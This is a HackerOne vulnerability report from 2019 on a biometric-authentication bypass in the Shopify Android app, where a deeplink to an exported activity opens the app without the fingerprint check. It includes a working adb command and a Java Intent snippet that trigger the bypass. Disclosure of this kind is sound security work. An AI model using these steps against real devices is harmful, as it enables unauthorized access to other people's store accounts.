Shopify: Bypass of biometrics security functionality is possible in Android application (com.shopify.mobile)

2019-07-07T15:03:49
ID H1:637194
Type hackerone
Reporter tems
Modified 2019-08-14T13:08:47

Description

Summary

Shopify Android App has an option to sign in to the app using fingerprint. But if the application was open and someone triggers a "deeplink", authentication is no longer required.

Step to Reproduce

{F523700} Link: Shopify Help Center - Topics - Products

NOTE¹: The application must be open when triggered com.shopify.mobile.lib.app.DeepLinkActivity. NOTE²: It is also possible via ADB and Java (Android App): adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products' java Intent intent = new Intent(); intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity"); intent.setData(Uri.parse("https://www.shopify.com/admin/products")); startActivity(intent);

My environment information: {F523698} {F523699}

Impact

Unauthorized access to use the application.